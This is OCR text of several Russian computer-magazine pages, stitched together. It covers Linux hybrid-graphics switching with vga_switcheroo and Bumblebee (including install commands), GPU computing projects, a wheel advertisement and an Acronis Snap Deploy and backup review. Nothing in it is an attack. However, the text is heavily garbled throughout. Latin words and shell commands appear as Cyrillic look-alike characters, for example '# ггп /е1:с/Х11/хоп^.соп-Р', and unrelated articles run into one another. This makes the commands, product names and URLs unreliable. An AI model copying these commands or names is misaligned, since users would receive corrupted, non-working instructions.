доступен, добавь в конфиг/е*с/*5*аЬ следующую запись: 

попе /зѵз/кегпеІ/сІеЬи^ сІеЬи^-Рз сІе-РаиІЁз 0 0 



А КАК ЖЕ 0РТІМІІ5? 



Для ноутбуков, основанных на технологии ІМѴЮІА Оріітиз, при- 
менение ѵда_зѵѵі*сЬегоо бессмысленно. Их система переключения 
между видеоадаптерами основана на виртуализации вызовов 
0репЗІ_, а не применении железного мультиплексора. Драй- 
вер ІМѴЮІА, применяемый в таких ноутбуках, работает в связке 
с интегрированной в материнку картой Іпіеі. Когда запускается 
приложение, драйвер ІМѴЮІА автоматически распознает, является 
ли оно ресурсоемким графическим приложением (это происходит 
с помощью анализа вызовов йігесіХ и базы данных приложений), 
и принимает решение о перенаправлении 0 реп С Ь команд драйверу 
Іпіеі, разгружая таким образом дискретную видеокарту ІМѴЮІА, 
либо об их обработке на карте ІМѴЮІА. При этом даже если при- 
ложение запускается на карте ІМѴЮІА, результирующая картинка 
все равно отправляется на карту Іп*еІ с помощью копирования 
изображения в ее буфер кадров. Таким образом удается добиться 
сосуществования приложений, работающих на разных адаптерах, 
на одном экране без необходимости постоянного переключения 
ноутбука на разные адаптеры и с возможностью отключить дис- 
кретный адаптер в случае его простоя. 

В существующие технологии І_іпих такой подход уклады- 
вается очень плохо, о чем ІМѴЮІА честно заявила сообществу, 
ссылаясь на ущербность Х-сервера, значительную часть которого 
пришлось бы переписать, и отказалась от поддержки Оріітііз 
в І_іпих. Тем не менее совсем скоро после начала повсеместного 
распространения технологии Дэйв Эрли Шаѵе Аігііе), сотрудник 
РесІ На* и один из девелоперов X ѴѴіпсіоѵѵ, разработал метод за- 
пуска приложений на разных графических картах с последующей 
компоновкой их вывода в единое изображение на уровне ядра 
1_іпііх (что интересно, работа была проделана на системе с ви- 
деоадаптером Рабеоп Р200). 

Позднее из его идей вырос проект ВитЫеЬее, авторы 
которого пошли еще дальше и вовсе отказались от какой-либо 
модификации ядра или драйверов в пользу применения второго 
Х-сервера, запущенного на дискретной видеокарте, но не при- 
вязанного к физическому дисплею. Для запуска ресурсоем- 
ких приложений на этом сервере используется специальная 
обертка, которая передает ему все 0репЗІ_-команды с помощью 
системы ѴИиаІЗІ. ( ѵѵѵѵѵѵ.ѵігіиаіді.огд) и перенаправляет сфор- 
мированное изображение в окно основного Х-сервера. Таким 
образом удается задействовать дискретный адаптер только 
для выбранных приложений почти так же, как это реализо- 
вано в драйверах ІМѴЮІА для ѴѴіпсІоѵѵз, но без использования 
фирменного механизма копирования памяти ТЬе Оріітиз Сору 
Епдіпе, из-за чего общая производительность приложений ока- 
залась несколько ниже. 

Тем не менее ВитЫеЬее работает и дает достаточно ощутимый 
прирост производительности 30-приложений. Начиная с третьей 
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версии, он также позволяет автоматически отключать дискретный 
адаптер в случае его бездействия и управлять его энергосбереже- 
нием. Ктомуже благодаря костыльно-велосипедной архитектуре 
его легко установить и начать использовать даже без перезагрузок 
и обновления драйверов. 

Прекомпилированные пакеты ВитЫеЬее доступны для дис- 
трибутивов БеЫап, ІІЬипІи, Ребога и Мапбгіѵа, а в виде портов 
есть в Сепіоо и АгсЫіпих, поэтому каких-либо проблем с уста- 
новкой возникнуть не должно. Единственное, что следует учесть, 
это необходимость установки специальной версии официальных 
драйверов ІМѴЮІА, которые не будут конфликтовать с библиотекой 
І_іЬ6І_, поставляемой вместе с пакетом Меза и используемой ин- 
тегрированной видеокартой Іпіеі. В случае ОеЬіап/ІІЬипІи замена 
официального проприетарного драйвера должна быть выполнена 
следующим образом: 

1. Перезагрузка в консольном режиме. 

2. Удаление драйвера ЫѴШІАисгенерированногоегоустановщи- 
ком конфига хогд.соггі: 

$ зисіо -з 

# пѵібіа-ипіпзііаіі 

# ггп /е1:с/Х11/хоп^.соп-Р 

3. Переустановка библиотеки І_іЬ6І_ из пакета Меза: 

# арі-^еі: --геіпзііаіі іпз ііаіі 1іЬ§11-теза-§1х 

4. Установка ВитЫеЬееизстороннегорепозитория: 

# асИ-арі-герозіІіогу рра : иЬипТи-х-зыаІг/х-ирбаІіез 

# абб-ар1:-геро5І1:огу рра : ЬитЬІеЬее/зІіаЫе 



# ар1:-§е1: ирсіаіе 

# арі-^еі: іпзііаіі ЬитЫеЬее 

5. Установка специальной версии драйвера ЫѴШІА: 

# ар1і-§е1і іпзііаіі ЬитЬІеЬее-пѵісІіа 

6. Перезагрузка в графический режим. 

Если ты собираешься использовать открытый драйвер ІМѴЮІА, 
достаточно будет выполнить только четвертый шаг, однако 
в этом случае производительность будет далеко не на высшем 
уровне. Если необходимо запустить 32-битные приложения 
в 64-битной системе (например, игр под ѴѴіпе), также нужно 
доустановить 32-битную версию ѴИиаІСІ.: 

# арі-§е1і іпзііаіі ѵіг1іиа1§1-1іЬ5-іа32 

После окончания установки в системе появится демон 
ЬитЫеЬееб, отвечающий за запуск фейкового Х-сервера и пере- 
дачу ему Ореп(ЗІ_-команд, и команда оріігип, используемая для 
запуска приложений на дискретной видеокарте. В ІІЬипІи демон 
уже должен быть запущен инсталлятором; в других системах, 
возможно, придется запускать его самостоятельно. Для провер- 
ки работоспособности ВитЫеЬее можно запустить стандартный 
0реп6І_-тест діхдеагз: 

$ орііі гип §1х§еагз 

Для запуска приложений под ѴѴіпе используем такую команду: 

$ орііігип міпе приложение. ехе 

Кстати, утилита пѵібіа-зеіііпдз по умолчанию работать не будет, 
и ее следует запускать с аргументом ’-с :8': 

$ орііпип пѵісііа-зеіііііп^з -с :8 

Для того чтобы получить наилучшую производительность, 
можно поиграться с опциями сжатия видеопотока, передаваемого 
с фейкового Х-сервера в окно настоящего. Для этого надо ис- 
пользовать опцию '-с команды оріігип, она принимает следующие 
аргументы: і р е д , гдЬ, уиѵ, ргоху и хѵ. Наиболее эффективные из них 
уиѵ и хѵ, но можно попробовать и другие. 



А БУДЕТ ЛИ ПРОЗРАЧНОЕ ПЕРЕКЛЮЧЕНИЕ 
МЕЖДУ АДАІ 1 1 1 I III дмммді 



Благодаря проектам ѵда_зѵѵі1сЬегоо и ВитЫеЬее пользователи 
І_іпих получили возможность хоть как-то задействовать вторую ви- 
деокарту современных ноутбуков, но говорить об удобстве этих спо- 
собов переключения, конечно же, не приходится. Сама графическая 



НЕСТАНДАРТНЫЕ МЕТОДЫ ИСПОЛЬЗОВАНИЯ 
ВЫЧИСЛИТЕЛЬНОЙ МОЩНОСТИ ГРАФИЧЕСКИХ КАРТ 



Проекты, целью которых является 
использование 6РІІ графических плат 
для системных вычислений, не связанных 
с графикой: 

• ВгоокбРІІ — язык (расширенный Си) 
и компилятор для математических 
вычислений с использованием 6РІІ; 



• 5Ь — метаязык, интегрируемый в С++ 
приложения, позволяет выполнять ряд 
вычислительных операций на СРІІ; 

• ІЧѴШІА Сд Тооікіі — библиотека от ІЧѴШІА 
для взаимодействия с 6РІІ; 

• 6РІІ5ог1 — использование 6РЫ для 
сортировки данных; 



• ѴРАМ Зіогаде Оеѵісе — Ьіпих-драйвер для 
создания логического диска с данными, 
хранимыми в видеопамяти; 

• дрдри.огд (бепегаІ-РигрозеСотриІаІіоп 
ІІзіпд бгарЬісз Нагсіѵѵаге) — специализиро- 
ваны ый сайт по нестандартному использо- 
ваниюбРІІ. 
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подсистема Ыпих мешает внятной реализации метода бесшовного 
переключения между адаптерами, и в первую очередь все упира- 
ется в устаревший Х-сервер, архитектура которого не позволяет 
реализовать совместное использование двух адаптеров на одном 
устройстве вывода. Это значит, что Х-сервер должен быть либо кар- 
динально изменен, либо выброшен и заменен на нечто новое. 

Возможно, разработчики ѴѴауІапсІ в скором времени и ре- 
шат эту проблему, однако пока мы остаемся на обычных иксах 
и можем полагаться только на их разработчиков. Один из них, уже 
упомянутый в этой статье Дэвид Эрли, успел добиться суще- 
ственных результатов в этом деле, переписав многие компоненты 
Х-сервера, а также добавив в ядро те самые изменения, о ко- 
торых было сказано в предыдущем разделе. В первую очередь 
его работа направлена на обеспечение возможности горячего 
подключения внешнего ІІ5В-адаптера ОізрІауЫпк и его нормаль- 
ного функционирования, однако наработки могут быть легко 
приспособлены для быстрого переключения между различными 
графическими картами. 

Принцип действия этой системы во многом аналогичен техноло- 
гии ІМѴЮІА Оріітіів, когда одна карта обрабатывает все операции 
отрисовки, а затем просто передает полученное изображение 
другому адаптеру (в данном случае ОізрІауЫпк). Все наработки 
будут доступны в Х-сервере версии 1.13, а также в новой версии 
ядра Ыпих. Для экспериментаторов доступны репозитории с уже 
примененными патчами, их список можно найти на странице кеШір. 
сот/Ыодв/ЬоірІид-сІізрІаѵІіпк . 



РАК4АЩ ИЛИ ПАРАЛЛЕЛЬНЫЕ ВЫЧИСЛЕНИЯ 
НА СКОРУЮ РУКУ ^ ■ 



В одном из предыдущих выпусков журнала мы уже писали про 
технологию СРВРІІ, которая позволяет задействовать мощности 
графических процессоров для ускорения вычислений в обычных 
приложениях. Главной проблемой этой технологии стала необ- 



ходимость переписать компоненты приложения на специальном 
диалекте языка Си, да еще и с расчетом, что код будет выполнять- 
ся на сотнях независимых ядер одновременно. Это сильно ограни- 
чило область применения технологии и существенно подняло по- 
рог вхождения, так как далеко не каждый программист способен 
написать высокораспараллеленный эффективный код. 

С этой проблемой решили разобраться ребята из проекта НРС, 
разработав специальный компилятор Раг4АІІ ( ѵѵѵѵѵѵ.раг4а1І.огд ), ко- 
торый может распараллелить практически любой последователь- 
ный код, написанный на языках Си и Рогігап. Получив в качестве 
входных данных код приложения, компилятор выдает на выходе 
уже оптимизированный для конкретной платформы распаралле- 
ленный код — можно затем либо скомпилировать его в итоговое 
приложение, либо провести дополнительную ручную оптимизацию 
для получения наибольшей производительности. 

В качестве платформ, для которых Раг4АІІ способен генериро- 
вать код, заявлены обычные многоядерные процессоры, системы 
с поддержкой СІЮА и ОрепСІ_, кластеры из графических процес- 
соров. Задача проекта — помочь разработчикам в миграции их 
приложений на современные многоядерные системы и системы 
с поддержкой технологии 6РСРІІ, не заставляя программистов 
вникать в современные технологии и тонкости проектирования 
параллельных приложений. 



ЧТО ДАЛЬШЕ? 



Современные графические адаптеры предоставляют пользо- 
вателям гораздо больше функциональности, чем просто вывод 
видеоизображения. Поддержка многих из этих функций уже 
реализована в открытых ОС, тогда как другие до сих остаются 
эксклюзивом для тех, кто использует продукцию МісгозоЙ. Тем не 
менее работа идет полным ходом, и в скором времени мы (юник- 
соиды) также сможем насладиться всеми благами современной 
«графической» индустрии. ЗС 



СВОБОДНЫЙ КОМПИЛЯТОР СІША-ПРИЛОЖЕНИЙ 
ДЛЯ МНОГОЯДЕРНЫХ Х86-ПРОЦЕССОРОВ 



• Имей в виду, что 
ѵда_5ѵѵіІсИегоо за- 
работает только в том 
случае, если ядро 
будет загружено без 
использования опции 
потосіезеі. 



В рамках проекта ОсеЫ создается ЛТ-компилятор 
для СІША-приложений, позволяющий выполнять одну 
и туже программу как на графических процессорах МѴШІА, 
так и на х86 процессорах, выступая в роли альтернативы 



технологии ОрепСІ_. Компилятор переводит инструкции СРІІ 
в байткод І_І_ѴМ, а затем генерирует собственный код для 
различных целевых архитектур. Компилятор был проверен 
более чем на ста приложениях СІЮА. 



ѴСКТС: ВИРТУАЛЬНЫЕ ВИДЕОКОНТРОЛЛЕРЫ ДЛЯ ШУХ 



Программист Илья Хаджич из компании ВеІІ І_аЬ5 представил 
реализацию виртуальных СВТС-видеоконтроллеров, 
которая обеспечивает перенаправление пикселей из 
фреймбуфера определенного 6РІІ на другое устройство 
вывода. При использовании виртуального контроллера СРТС 
можно манипулировать выводом информации в гибридных 
системах с несколькими видеокартами, абстрагируя 6РІІ, 
на котором осуществляется рендеринг, и непосредственное 
устройство вывода. Например, с помощью ѴСРТС можно 
выполнять сложный рендеринг на 6РІІ дискретной карты, 
а выводить информацию через интегрированную видюху. 
Кроме того, при подключении через порт 115В внешнего 



видеоадаптера 0І5рІауІ_іпк можно сформировать сложную 
Зй-сцену с использованием 6РІІ стационарной видеокарты, 
а вывести ее на внешнюю карту. Что интересно, сформировав 
изображение на СРІІ, но использовав для вывода драйвер 
Ѵ4І_2, возможно перенаправление сформированного 
на 6РІІ потока по сети, с его последующей обработкой 
в любом приложении, поддерживающем Ѵ4І_2 (например, 
в видеоплеере ѴІ_С). 

В настоящее время поддерживается работа с драйвером 
Расіеоп и 6РІІ Р6ХХ, Р7ХХ, Еѵегдгееп, ІМогШетп Ізіапсі. 

В будущем планируется добавить поддержку драйверов ІпіеІ 
и ІМоиѵеаи. 



• Команды ѵда_зѵѵіІ 
сЬегоо можно передать 
и во время загрузки 
ядра. Например: 
НуЬгісІорІ5=0М,І60,0РР. 

• Технологии, приме- 
ненные в компиляторе 
Раг4АІІ, основаны на 
материалах 20-летнего 
академическо- 
го исследования 
государственной 
американской исследо- 
вательской программы 
«ІпІегРгосесІигаІ 
РагаІІеІізаІіоп о! 
зсіепШіс ргодгатз». 

• Разработчики из 
компании СапопісаІ 
создали драйвер 
гибридной графической 
подсистемы СМІІХдля 
ядра Ыпих, который по- 
зволяет организовать 
переключение между 
несколькими СРІІ 

и управлять подсветкой 
экрана на ноутбуках 
Арріе МасВоок Рго. 
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ЭТИ ТРИ БУКВЫ СТАЛИ СИМВОЛОМ ОСОБОГО СТИЛЯ И ВЫСОЧАЙШЕГО 
КАЧЕСТВА ДЛЯ АВТОМОБИЛЬНЫХ ЭНТУЗИАСТОВ СЕВЕРНОЙ АМЕРИКИ. 
СЕГОДНЯ МЫ ПОСТАРАЕМСЯ ПРИОТКРЫТЬ ЗАВЕСУ ТАЙНЫ И ПОНЯТЬ 
В ЧЕМ ЖЕ УСПЕХ ЭТИХ КОЛЕСНЫХ ДИСКОВ. 



Во-первых, это серьезный контроль качества 
выпускаемой продукции. Каждый диск проходит 
несколько уровней проверки по различным пара- 
метрам. Новейшее технологическое оборудование 
на заводах Т5ѴѴ дает гарантию того, что ни один 
дефект не останется незамеченным. Дело в том, 
что к производственному процессу здесь относятся 
также трепетно, как и к последующей стадии про- 
верки изделий. Все это внимание и забота доходят 
до счастливого покупателя с каждым колесным 
диском Т5ѴѴ. 

Во-вторых, это компания, которая думает не 
только о технической составляющей, но и эмоцио- 
нальной. А потому каждый год на рынке появля- 



ются сразу несколько моделей первоклассных 
колесных дисков Т5ѴѴ. Наряду с универсальными 
дисками, которые подходят на любой автомобиль 
иностранного производства (при условии правиль- 
но подобранных посадочных размеров), компания 
выпускает специальные линейки для опреде- 
ленных марок автомобилей. Тем самым усилия 
дизайнеров направлены не на беспорядочную 
толпу жаждущих хлеба и зрелищ (как известно, 
всем сразу не угодишь), а на вполне определенных 
клиентов с конкретными запросами и пожела- 
ниями. Отсюда безмерная благодарность тех, кто 
уже сделал свой выбор в пользу Т5ѴѴ, и растущий 
интерес новой аудитории. 




Реклама 



Москва 

ул. Электродная, д. 14/2 
(495) 231-4383 
ул. Островитянова, вл. 29 
(499) 724-8044 

Санкт Петербург 

Екатерининский пр-т, д. 1 
(812) 603-2610 



ул. Электродная, д. 10, стр. 32, 
(495) 231-2363 

ѵѵѵѵѵѵ.коігасі.ги 

ИНТЕРНЕТ МАГАЗИНЫ 

ѵтѵу.аіігасі.ги 

(495)730-2927/368-8000/672-7226 

ѵтѵѵ.ргокоіа.пеі 

(812)603-2610/603-2611 





5УЫ/АСК 



Сергей Яремчук (дгіпсІег(д5упаск.ги] 



Развернуть ' 
и настроитъ 

РЕШЕНИЯ АСК0ЫІ5 ДЛЯ АВТОМАТИЗАЦИИ УСТАНОВКИ ОС 
НА МНОЖЕСТВО КОМПЬЮТЕРОВ И ОРГАНИЗАЦИИ ЦЕНТРАЛИ- 
ЗОВАННОГО РЕЗЕРВИРОВАНИЯ В ГЕТЕРОГЕННЫХ СЕТЯХ 



Одна из главных задач 
ІТ-службы — обеспечить не- 
прерывность информационных 
процессов всего предприятия 
и каждого его подразделения. 
Когда приобретаются новые 
системы или выходят из строя 
ПК, рабочие места обычно 
простаивают — а это убытки 
для бизнеса. Поэтому очень 
важно научиться развертывать 
ОС и приложения, восстанав- 
ливать их работоспособность 
и поврежденные (похищенные) 
данные в кратчайшие сроки. 




НАЗНАЧЕНИЕ АСР0ЫІ5 5ИАР йЕРЮУ 



В зависимости от структуры организации и количества кли- 
ентских/серверных систем процесс развертывания ОС, драй- 
веров и приложений может быть достаточно сложным и занять 
достаточно много времени. Чтобы облегчить труд сисадминов, 
в недрах МісгозоІЧ разрабатывается целый ряд специаль- 
ных инструментов (ѴѴіпсІоѵѵз Оеріоутепі Зегѵісез, МісгозоІЧ 
Оеріоутепі ТооІкЧ и Бузіепп Сепіег СопЛдигаІіоп Мападег), 
обеспечивающих возможность установки ОС с последующим на- 
катом всего, что нужно, при помощи готовых настроек. При этом 
ѴѴІ М -образ (ѴѴіпсІоѵѵз Ітадіпд Рогтаі) со всеми патчами и файл 



ответов, автоматизирующий установку, предлагается создавать 
средствами ѴѴАІК (ѴѴіпсІоѵѵз Аиіотаіесі Іпзіаііаііоп КЧ, см. статью 
«Самосборные окна», ][_01_2009). Единственное затруднение: 
настройка среды потребует некоторого времени, а в последую- 
щем конфигурацию придется уточнять по мере необходимости. 
Главное достоинство такого метода — возможность учитывать 
особенности оборудования каждого компьютера и будущего 
рабочего места. Другой подход к автоматизации процедуры раз- 
вертывания заключается в клонировании систем из созданного 
дискового образа. Принцип весьма прост: устанавливаем на 
шаблонный ПК ОС и все нужные приложения, затем клонируем 
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Развернуть и настроить 




В работе с Асгопіз 5пар йеріоу очень помогают мастеры 

системный раздел и размножаем его на остальные ПК. Отличный 
способ, когда нужно развернуть или восстановить работоспо- 
собность множества систем стандартной конфигурации, в том 
числе в виртуальной среде. Этот вариант проще и понятней 
в реализации и быстрее при развертывании, хотя не такой гиб- 
кий, как предыдущий, поскольку при изменении состава ПО или 
при использовании другого оборудования необходимо создавать 
новый образ (кстати, никто не мешает подготовить несколько 
слепков, чтобы охватить все ситуации). 

В Асгопіз 5пар йеріоу используется второй вариант, но со 
своими нюансами. В общем и целом процесс выглядит следую- 
щим образом. Администратор создает мастер-образ эталонного 
ПК с предустановленной ѴѴіпсІоѵѵз или І_іпих и отправляет его 
на сервер. Новый ПК при помощи РХЕ загружает специальный 
агент, который закачивает и разворачивает образ. Если ВІ05 
компьютера не поддерживает сетевую загрузку, агент можно 
запустить при помощи загрузочного СО/ОѴй, 115В или дискеты, 
которые создаются при помощи самого А50. Поддерживается 
индивидуальная (для конкретного МАС) или многоадресная 
передача (ІР — 239.255.219.45), позволяющая развернуть одно- 
временно несколько систем, снижая тем самым нагрузку на сеть 
и ускоряя процесс ввода ПК в эксплуатацию. Также возможна 
установка значения ТИ для многоадресной рассылки, что 
позволит ограничить распространение сетевых пакетов через 
шлюзы. Все действия заносятся в журнал, поэтому проследить 
события совсем не сложно. 

Шаблонный образ можно развернуть вручную или по распи- 
санию. Предусмотрено так называемое «оперативное» создание 
образа, которое производится на работающей системе. Для этого 
на ПК должен быть установлен агент, который также попадет на 
диск, что не всегда желательно. Поэтому более рациональным 
считается автономное создание образа, когда компьютер загружа- 
ется при помощи загрузочного носителя Асгопіз. Если компьютер 
содержит несколько дисков и разделов, мастер создания образа 
позволяет отобрать нужные (не поддерживаются динамические 
диски и диски с 6РТ). 



ОБРАЗЫ, ОБРАЗЫ 



Очень удобно, что в качестве эталонного может быть использован 
образ, который создается программой резервного копирования 
Асгопіз Тгие Ітаде или Асгопіз Васкир & Ресоѵегу. За счет этого при 
организации периодического бэкапирования снимаются все вопро- 
сы об актуальности ПО и наличии всех заплаток для каждого хоста. 
В версии А5й 4 также поддерживается ѴИиаІ НагсІ йізк (ѴЕЮ), соз- 
данный программой архивации ѴѴіп7, ѴИиаІ РС или Асгопіз. Поэтому 
такая схема удобна не только для развертывания ОС на голое 



железо, но и для быстрого восстановления или возврата системы 
в исходное состояние. Последнее может понадобиться при обучении 
или в том случае, когда компьютером пользуются несколько человек 
(например, в интернет-кафе). Предусмотрено и так называемое 
пользовательское развертывание, когда его инициирует сам поль- 
зователь, выбравший соответствующий пункт в меню загрузки ОС. 

Образ может быть сохранен на жесткий диск сервера (рекомен- 
дуется), сетевой ресурс, С й/ОѴО/В I и -гау или ІІ5В-устройство. Если 
образ не помещается на один Сй/ОѴО, будет запрошен следующий. 
Поддерживается несколько степеней сжатия, но это потребует 
большего времени и ресурсов. 

При помощи А5й поддерживается установка ОС ѴѴіпсІоѵѵз, начи- 
ная с ІМТ/98, и І_іпих, снятие образов с файловых систем РАТ, ІМТР5, 
ех*2/3/4, РеізегРЗ, Реізег4, ХР5, ЭР5 и І_іпих 5ѵѵар. Предусмотрено 
посекторное снятие образа и развертывание ОС с официально не 
поддерживаемых ФС. 



ПОЛЕЗНЫЕ ФИЧИ 



В процессе развертывания современных ѴѴіпсІоѵѵз- версий А5й по- 
зволяет изменить некоторые параметры — имя, сетевые настрой- 
ки, членство в домене / рабочей группе, идентификатор безопас- 
ности 5Ю (Бесигііу I сІепІіНег), лицензию. Этим А5й отличается от 
других подобных систем клонирования ОС, которые, как правило, 
не умеютуправлять 5Ю, и, чтобы сделать его уникальным, при- 
ходится задействовать дополнительный инструмент — Зузргер 
(Зузіет Ргерагаііоп ТооІ). 

Также на целевой машине можно запустить приложение 
или скрипт, скопировать файлы. Для удобства можно создавать 
шаблоны развертывания и использовать их в последующем. Еще 
один важный момент — программа умеет изменять размер томов 
в зависимости от наличия свободного места на целевом диске, 
подгоняя итоговый размер (растягивая) или оставляя его как есть 
(с незанятым пространством). 

Проблему установки ОС на оборудовании, отличном от мастер- 
ПК, решает дополнительный модуль Асгопіз СІпіѵегзаІ йеріоу (АІЮ), 
который поставляется за отдельную плату и способен автоматиче- 
ски настраивать драйверы ѴѴіпсІоѵѵз. 



КОМПОНЕНТЫ А50 



Для решения поставленных задач А5й использует несколько 
компонентов: сервер развертывания (йеріоу Бегѵег), консоль 
управления, РХЕ-сервер, агент управления и сервер лицен- 
зий, которые могут быть установлены на ПК под управлением 
ѴѴіпсІоѵѵз ХР и выше. Еще один компонент — ѴѴаке-оп-І_АІМ 
Ргоху — позволяет включать компьютеры, находящиеся в другой 
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После настройки компоненты должны быть переданы на РХЕ-сервер 



подсети, куда не проходит сигнал ѴѴаке-оп-І_АІ\І. Компоненты 
можно устанавливать на одну или разные машины. Учитывая, 
что йеріоу 5егѵег обычно хранит все образы, может понадобить- 
ся хард большой емкости. Для консоли управления подойдет 
обычный ПК, работающий под управлением десктоп ной версии 
ѴѴіпсіоѵѵз. Также с помощью консоли можно установить на уда- 
ленные системы остальные компоненты А5й, для чего необхо- 
димо перейти в «Сервис -> Установить компоненты удаленно», 
затем выбрать нужное в %РгодгатРіІе5%\Соттоп РіІез\АсгопІ5\ 
5пар0ерІоу\Рето*еІпз*аІІ и указать ІР или имя ПК. При этом по- 
требуются права администратора. Если удаленный ПК работает 
под управлением ѴѴіп7, обязательно отключи II АС. 

Загрузочный носитель может быть двух типов, оба имеют сход- 
ный графический интерфейс, но отличаются набором компонентов. 
Так, загрузочный носитель Асгопіз основан на І_іпих и рекомен- 
дуется в большинстве случаев. Если оборудование распознается 
неверно, следует использовать загрузочный носитель РХЕ, собран- 
ный в среде ѴѴіпРЕ (требуется ѴѴАІК). После сборки загрузочных 
компонентов их следует передать на выбранный РХЕ-сервер. 

Для управления используется графическая консоль и сред- 
ства командной строки. Сам процесс инсталляции компонентов 
А5й и последующая работа в консоли производятся при помощи 
понятных мастеров, сводящих к минимуму риск некорректной 
установки параметров. Названия пунктов меню четкие и кон- 
кретные, к тому же продукт хорошо документирован и локализо- 
ван, поэтому проблем с его использованием обычно не возника- 
ет. После запуска консоль подключается к локальному серверу; 
если нужно управлять компонентом (сервер, сервер лицензий, 
РХЕ-сервер и агент управления), находящимся на другой 
машине, выбираем пункт меню «Подключиться» и указываем 
ІР-адрес. Создание и настройка образа производятся из меню 
«Экран приветствия». 

Все соединения между агентом и сервером защищены, что по- 
зволяет избежать перехвата информации. При использовании РХЕ 
для установки ОС есть одна опасность: если в ВІ05 по ошибке будет 
оставлена сетевая загрузка, пользователь может инициировать 
инсталляцию. Поэтому программу установки лучше защитить паро- 
лем, введя его в соответствующем окне мастера. Для обеспечения 
работы РХЕ в сети должен быть активен йНСР-сервер. 

Лицензии на А5й требуются для каждой развертываемой 
машины: на любое количество установок на конкретной машине 
или одну успешную установку на любой машине (отслеживается 
по МАС-адресу). Лицензия может быть двух типов — серверная 
или ПК, по мере установки они обычно распределяются автомати- 
чески. Но если мастер развертывания не знает, какой тип лицензии 
применить на текущую установку, будет выдан запрос. 



РЕЗЕРВИРОВАНИЕ ДАННЫХ ■ 
С АСРОИІЗ ВАСКІІР & РЕСОѴЕРУ 



А5й умеет снимать образ раздела, но не может заменить специали- 
зированные приложения для резервного копирования. Полные 
копии харда, включающие пользовательские данные, будут 
занимать значительное место, грузить сеть и требовать больших 
ресурсов для обработки. Кроме того, найти и восстановить отдель- 
ный файл с его помощью проблематично, придется разворачивать 
весь образ. Поэтому в данном случае стоит обратить внимание на 
более гибкие специализированные решения, например на Асгопіз 
Васкир & Ресоѵегу (АВР), который является продолжением линейки 
популярного Асгопіз Тгие Ітаде. АВР предназначен для создания 
резервных копий и восстановления данных на десктопах, серве- 
рах и виртуальных машинах (ѴМѵѵаге, Нурег-Ѵ, ХепЗегѵег, РесІ На* 
Еп*егргізе ѴИиаІігаІіоп и РагаІІеІз Зегѵег). Необходимые функции 
реализованы соответственно в версиях ѴѴогкз*а*іоп, Зегѵег и ѴИиаІ 
ЕсІШоп. С помощью АВР можно забэкапить весь жесткий диск, раз- 
дел (поблочное и посекторное копирование) или отдельные папки 
и файлы по выбору пользователя. Мастер создания резервных ко- 
пий позволяет указать шаблоны файлов, которые нужно исключить, 
поэтому результат будет содержать только то, что действительно 
важно. Созданный образ можно просматривать в Проводнике как 
обычную папку или подключить к системе как диск и работать с ним 
в режиме чтение/запись или только чтение. При этом для создания 
копии нет необходимости останавливать систему. 

По сравнению с А5й поддерживается большее количество 
типов дисков: МВР и СРТ, базовые и динамические. Распознаются 
данные М5 ЕхсЬапде и 501 Зегѵег, поэтому администратор может 
найти и восстановить копию письма или любого файла. Предусмо- 
трена возможность шифрования и сжатия результирующего 



СІ_ОМЕ2ІІ_І_А — 
ОПЕНСОРСНАЯ 
АЛЬТЕРНАТИВА 



Чтобы клонировать ОС, не обязательно 
покупать проприетарный Асгопіз, можно 
выбрать один из проектов с Ореп Зоигсе 
лицензией. Наибольшей популярностью 
пользуется СІопегіІІа ( сіопегіііа.огсі ). 
которая позволяет создавать и восста- 
навливать ОС из образа. Официально 
поддерживается большое количество 
ФС, используемых в І_іпих (включая І_ѴМ), 
ѴѴіпсіоѵѵз, *В50, Мае 05 X и продуктах 
ѴМѵѵаге, в которых резервируются только 
занятые блоки (используется Раг*сІопе, 
Раг*ітаде или пНзсІопе). Остальные мож- 
но «снять» посекторно, для этих целей 
применяется сісі. Поэтому каких-либо 
ограничений по ОС нет. Результат сохра- 
няется локально, на сменный носитель 
и удаленный сервер (55Н, 5МВ, ІЧР5). 
Специальная версия СІопеііІІа 5Е (Зегѵег 
ЕсІі*іоп) позволяет клонировать образы 
на несколько систем при помощи РХЕ, 
в том числе с использованием пгшПісаз*. 
Конечно, все настройки йНСР, РХЕ, ТРТР 
и ІМР5 потребуется произвести вручную, 
но они хорошо документированы, поэтому 
проблем быть не должно. 



гтш 

* Об использовании 
ѴѴіпсіоѵѵз АІК читай в ста- 
тье «Самосборные окна» 
в 01/2009 номере ][. 

* Подробно о настройке 
ѴѴіпсіоѵѵз йеріоутепі 
Бегѵісез читай в 
06/2007 выпуске]!. 

• Для ѴМѵѵаге ѵБрИеге 
или М5 Нурег-Ѵ воз- 
можно использование 
единого агента для хост- 
машины, позволяющего 
контролировать сразу 
все ѴМ. 

• Асгопіз Васкир & 
Ресоѵегу Зегѵег под- 
держи ваетх86/х64 ОС 
ѴѴіпсіоѵѵз, начиная от 
2к5Р4 и Ыпих, файловые 
системы РАТ16/32, ИТРБ, 
ех12/3/4, РеізегРБ, ХР5 
И.ІР5. 



ѴѴАКЫШС 



* Для работы Асгопіз 
ІІпіѵегзаІ йеріоу требу- 
ется открыть ТСР/445, 
ТСР/9876, II й Р/9876, 
ІЮР/9877, ТСР/25001 

и для РХЕ — ІЮР/67-69. 

• Чтобы пользователь 
не могслучайно иници- 
ировать РХЕ-установку, 
настройки лучше за- 
щитить паролем. 
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Развернуть и настроить 




Консоль Асгопіз Васкир & Кесоѵегу Бегѵег 

образа, ограничение нагрузки на сеть, автоматическое разбиение 
копии на части, выполнение команд перед операцией и после 
операции. Новая резервная копия может создаваться одноразово, 
по расписанию и при наступлении определенного события (напри- 
мер, выход пользователя из системы). Кроме этого, предустановки 
содержат несколько готовых схем. Все это дает админу гибкие 
возможности управления процессом. 

Резервное копирование может выполняться на устройства 
хранения 5АІМ/ІМА5, оптические приводы и ленточные устрой- 
ства, сетевые папки и РТР-сервер. Причем мастер резервного 
копирования позволяет указать до пяти мест хранения файлов, 
повышая тем самым избыточность. В процессе хранения можно 
перемещать устаревшие копии из одного хранилища в другое. 

Для компьютеров, которые часто находятся вне локалки, можно 
задать бэкап в специальный раздел жесткого диска Асгопіз Весите 
2опе (А52, по сути, это РАТ32 с меткой АСР0ІМІ5 52 и кодом рагМіоп 
Іуре ОхВС), защищенный от вирусов и скрытый от пользователя. 
Удобно, что восстановить данные из А52 можно очень быстро, 
но это не спасает в случае выхода из строя самого жесткого диска. 

Модуль дедупликации экономит дисковое пространство, 
устраняя дублирование идентичных данных: если в хранилище уже 
имеется архивируемый файл, то просто создается ссылка. Для обе- 




Для быстрого восстановления данных можно использовать зону безопасности Асгопіз 




Создаем план резервного копирования 

спечения целостности данных на уровне приложений используется 
